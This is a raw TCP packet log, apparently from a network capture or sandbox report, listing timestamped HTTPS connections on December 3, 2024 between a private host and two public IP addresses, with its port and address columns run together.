                                                                                                                      Dec 3, 2024 08:55:11.968322992 CET4434983213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:11.968475103 CET49832443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.968544006 CET49833443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.968565941 CET4434983313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:11.968663931 CET49833443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.969579935 CET49834443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.969589949 CET4434983413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:11.969646931 CET49834443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.969943047 CET49832443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.969955921 CET4434983213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:11.970036983 CET49833443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.970052004 CET4434983313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:11.971179008 CET49835443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.971187115 CET4434983513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:11.971255064 CET49835443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.971296072 CET49834443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.971306086 CET4434983413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:11.971390963 CET49835443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.971405029 CET4434983513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:11.972445965 CET49836443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.972472906 CET4434983613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:11.972579956 CET49836443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.973097086 CET49836443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:11.973109961 CET4434983613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.163863897 CET44349813196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.163876057 CET44349813196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.163911104 CET44349813196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.163949013 CET49813443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.164002895 CET49813443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.166238070 CET44349813196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.166301012 CET49813443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.166306019 CET44349813196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.166316032 CET44349813196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.166363955 CET49813443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.166872025 CET49813443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.166882038 CET44349813196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.167371035 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.167392015 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.167480946 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.168737888 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.168751001 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.318130016 CET49838443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.318190098 CET44349838196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:12.318270922 CET49838443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.318490982 CET49838443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:12.318506956 CET44349838196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.086894989 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.087270975 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.087301970 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.087635994 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.088447094 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.088509083 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.088835001 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.093713999 CET44349825196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.093936920 CET49825443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.093957901 CET44349825196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.094099998 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.094295979 CET44349825196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.095555067 CET49825443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.095607996 CET44349825196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.095992088 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.096014023 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.096200943 CET49825443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.097143888 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.097203016 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.097490072 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.097553015 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.097614050 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.097620964 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.127511978 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.128170013 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.128180027 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.129205942 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.129264116 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.129595041 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.129657984 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.129710913 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.129717112 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.131331921 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.140675068 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.143332005 CET44349825196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.173253059 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.688875914 CET4434983613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.689563990 CET49836443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:13.689596891 CET4434983613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.690099001 CET49836443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:13.690104961 CET4434983613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.691323042 CET4434983313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.691648006 CET49833443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:13.691678047 CET4434983313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.692001104 CET49833443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:13.692007065 CET4434983313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.743225098 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.743683100 CET49831443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.743706942 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.744791031 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.744882107 CET49831443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.750761032 CET4434983213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.751609087 CET49831443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.751698017 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.751777887 CET49831443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.751791000 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.752346992 CET49832443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:13.752363920 CET4434983213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.752846956 CET49832443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:13.752851009 CET4434983213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.753427029 CET4434983413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.753720045 CET49834443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:13.753731012 CET4434983413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.754101038 CET49834443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:13.754103899 CET4434983413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.791331053 CET49831443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.877935886 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.878355980 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.878375053 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.879462957 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.879533052 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.879923105 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.879986048 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.880078077 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.880084991 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.922224045 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.937185049 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.937210083 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.937218904 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.937304974 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.937329054 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.941008091 CET44349825196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.941689968 CET44349825196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.941778898 CET49825443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.942712069 CET49825443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.942724943 CET44349825196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.943224907 CET49839443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.943252087 CET44349839196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.943753958 CET49839443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.944401026 CET49839443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.944412947 CET44349839196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.950297117 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.950324059 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.950393915 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.950411081 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.956048012 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.956073046 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.956079960 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.956132889 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.956145048 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:13.987055063 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:13.995157957 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.003752947 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.125768900 CET4434983613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.125818014 CET4434983613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.125884056 CET49836443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.126193047 CET49836443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.126209021 CET4434983613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.126218081 CET49836443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.126224041 CET4434983613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.129272938 CET49841443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.129311085 CET4434984113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.129457951 CET49841443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.129734039 CET49841443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.129746914 CET4434984113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.131192923 CET4434983313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.131258965 CET4434983313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.131321907 CET49833443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.131522894 CET49833443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.131536961 CET4434983313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.131548882 CET49833443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.131553888 CET4434983313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.134722948 CET49842443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.134737015 CET4434984213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.134987116 CET49842443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.135297060 CET49842443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.135308981 CET4434984213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.135907888 CET44349838196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.136121988 CET49838443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.136131048 CET44349838196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.137018919 CET44349838196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.137075901 CET49838443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.137639046 CET49838443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.137696028 CET44349838196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.137789011 CET49838443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.179338932 CET44349838196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.180181026 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.180191994 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.180222988 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.180246115 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.180301905 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.187808037 CET49838443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.187820911 CET44349838196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.192130089 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.192137957 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.192195892 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.194514036 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.194524050 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.194593906 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.195034981 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.195046902 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.195111036 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.195600986 CET4434983213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.195661068 CET4434983213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.195712090 CET49832443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.195960045 CET49832443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.195972919 CET4434983213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.195982933 CET49832443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.195987940 CET4434983213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.197305918 CET4434983413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.197386980 CET4434983413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.197478056 CET49834443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.197578907 CET49834443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.197582960 CET4434983413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.197591066 CET49834443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.197594881 CET4434983413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.199795961 CET49843443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.199822903 CET4434984313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.199892998 CET49843443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.200081110 CET49843443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.200088978 CET4434984313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.200151920 CET49844443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.200176954 CET4434984413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.200278997 CET49844443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.200330973 CET49844443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:14.200340033 CET4434984413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.205990076 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.205997944 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.206057072 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.206062078 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.206098080 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.206104040 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.206173897 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.206564903 CET49827443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.206573963 CET44349827196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.207333088 CET49845443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.207341909 CET44349845196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.207398891 CET49845443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.208540916 CET49845443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.208549976 CET44349845196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.213099957 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.213114023 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.213155985 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.213200092 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.223098993 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.223166943 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.229559898 CET49838443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.231127024 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.231136084 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.231190920 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.239967108 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.240042925 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.431415081 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.431431055 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.431472063 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.431516886 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.431533098 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.431554079 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.431585073 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.431612968 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.436014891 CET49828443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.436024904 CET44349828196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.436582088 CET49846443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.436604023 CET44349846196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.436670065 CET49846443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.439882994 CET49846443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.439896107 CET44349846196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.450823069 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.450836897 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.450938940 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.463232994 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.463309050 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.478146076 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.478214979 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.493093014 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.493164062 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.512864113 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.512979031 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.527769089 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.527843952 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.542648077 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.542715073 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.542718887 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.542766094 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.543471098 CET49826443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.543488979 CET44349826196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.543947935 CET49847443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.543983936 CET44349847196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.544064999 CET49847443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.545092106 CET49847443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.545101881 CET44349847196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.577737093 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.577769041 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.577778101 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.577851057 CET49831443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.577872038 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.626214027 CET49831443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.715590954 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.715612888 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.715620995 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.715691090 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.715703011 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.723814011 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.723871946 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.723877907 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.724386930 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.724419117 CET44349837196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.724478960 CET49837443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.724843025 CET49848443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.724868059 CET44349848196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.725179911 CET49848443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.725770950 CET49848443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.725784063 CET44349848196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.817810059 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.817821980 CET44349831196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:14.817882061 CET49831443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:14.817934036 CET49831443192.168.2.4196.22.142.143
